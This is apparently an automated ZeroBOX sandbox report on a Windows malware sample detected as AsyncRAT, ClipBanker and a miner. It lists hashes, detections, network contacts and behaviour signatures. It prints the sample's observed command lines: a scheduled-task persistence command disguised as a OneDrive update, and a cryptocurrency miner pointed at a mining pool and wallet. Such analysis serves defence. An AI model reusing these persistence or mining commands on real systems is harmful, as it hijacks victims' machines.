Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 15, 2021, 1:51 p.m.	Sept. 15, 2021, 1:54 p.m.

Size	10.9MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`f6b0a679d3821681191512265666d981`
SHA256	`5e57b5d9ac36c832f8891a17a82828bb0a248506c1d12fc4e8933002ac7a7d3d`
CRC32	`2DD5B925`
ssdeep	`196608:e2mQb8h1vVa7KSMEjSURy2Vg2Exdk7MG670uF+0ip1+OkLVDcdjO/R6KbhdPRgC:b41NSMEOURPHExSM0n1+OkLIjO/Rp9kC`
Yara	Malicious_Packer_Zero - Malicious Packer UPX_Zero - UPX packed file PE_Header_Zero - PE File Signature Generic_Malware_Zero - Generic Malware OS_Processor_Check_Zero - OS Processor Check Is_DotNET_EXE - (no description) Malicious_Library_Zero - Malicious_Library Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

schtasks.exe "schtasks.exe" /create /tn OneDriveStandalone-API-Method-Update-8-7736888177-3994777-719430009-19199 /tr "C:\Users\test22\AppData\Roaming\Audio API MMS\C4E07DBC61\OneDriveStandaloneAPIMethod.exe" /st 23:38 /du 23:59 /sc daily /ri 1 /f
1188
cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\tmp2FDE.tmp.bat""
900
- timeout.exe timeout 4
  2220
RtkNGuigpuAPI.exe "C:\Users\test22\AppData\Roaming\Microsoft\C4E07DBC61G\RtkNGuigpuAPI.exe" -pool eth-eu2.nanopool.org:9999 -wal 0xd079a4aa3eaca2191e0dd013265216a56b0161fb -worker C4E07DBC61 -epsw 002700z002700 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 95 -tstart 90 -coin eth
2608

Name	Response	Post-Analysis Lookup
api.telegram.org	A 149.154.167.220	149.154.167.220

IP Address	Status	Action
149.154.167.220	Active	Moloch
164.124.101.2	Active	Moloch
185.92.150.213	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 149.154.167.220:443 -> 192.168.56.101:49203	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.101:49203 -> 149.154.167.220:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 15, 2021, 1:53 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Sept. 15, 2021, 1:53 p.m.	buffer: The batch file cannot be found. console_handle: 0x0000000b	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 15, 2021, 1:47 p.m.		1	1	0

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\Audio API MMS\C4E07DBC61\OneDriveStandaloneAPIMethod.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Roaming\Audio API MMS\C4E07DBC61\OneDriveStandaloneAPIMethod.exe
file	C:\Users\test22\AppData\Local\Temp\12332123331.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00aedc00', u'virtual_address': u'0x00002000', u'entropy': 7.664104972382682, u'name': u'.text', u'virtual_size': u'0x00aedb94'}

entropy

7.66410497238

description

A section with a high entropy has been found

entropy

0.999821316894

description

Overall entropy of this PE file is high

Yara rule detected in process memory (31 events)

description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Detection of Virtual Appliances through the use of WMI for use of evasion.	rule	WMI_VM_Detect
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook

Communicates with host for which no DNS query was performed (1 event)

host

185.92.150.213

Attempts to identify installed AV products by installation directory (1 event)

file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 900 resumed a thread in remote process 1768
NtResumeThread Sept. 15, 2021, 1:53 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 1768	1	0	0

File has been identified by 34 AntiVirus engines on VirusTotal as malicious (34 events)

Elastic	malicious (high confidence)
DrWeb	BackDoor.AsyncRATNET.1
MicroWorld-eScan	IL:Trojan.MSILZilla.2050
FireEye	Generic.mg.f6b0a679d3821681
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Cybereason	malicious.1574c9
BitDefenderTheta	Gen:NN.ZemsilF.34142.@p0@aGxFN!n
Cyren	W32/MSIL_Agent.BTI.gen!Eldorado
ESET-NOD32	a variant of MSIL/Agent.CFW
APEX	Malicious
ClamAV	Win.Packed.AsyncRAT-9856570-1
Kaspersky	HEUR:Trojan-Banker.MSIL.ClipBanker.gen
BitDefender	IL:Trojan.MSILZilla.2050
Avast	Win32:RATX-gen [Trj]
Tencent	Msil.Trojan-banker.Clipbanker.Eeqq
Ad-Aware	IL:Trojan.MSILZilla.2050
McAfee-GW-Edition	BehavesLike.Win32.Generic.vc
Emsisoft	IL:Trojan.MSILZilla.2050 (B)
MaxSecure	Trojan.Malware.300983.susgen
Avira	HEUR/AGEN.1138205
Microsoft	Trojan:MSIL/ClipBanker.GF!MTB
Arcabit	IL:Trojan.MSILZilla.D802
ZoneAlarm	not-a-virus:HEUR:RiskTool.Win64.Miner.gen
GData	IL:Trojan.MSILZilla.2050
Cynet	Malicious (score: 99)
AhnLab-V3	Trojan/Win.Tiggre.C4630644
ALYac	IL:Trojan.MSILZilla.2050
MAX	malware (ai score=89)
Malwarebytes	Malware.AI.3876622291
Rising	Spyware.ClipBanker!1.B627 (CLASSIC)
SentinelOne	Static AI - Malicious PE
AVG	Win32:RATX-gen [Trj]
Panda	Trj/GdSda.A

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (3 events)

dead_host	192.168.56.101:49216
dead_host	192.168.56.101:49211
dead_host	185.92.150.213:7707

12332123331.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All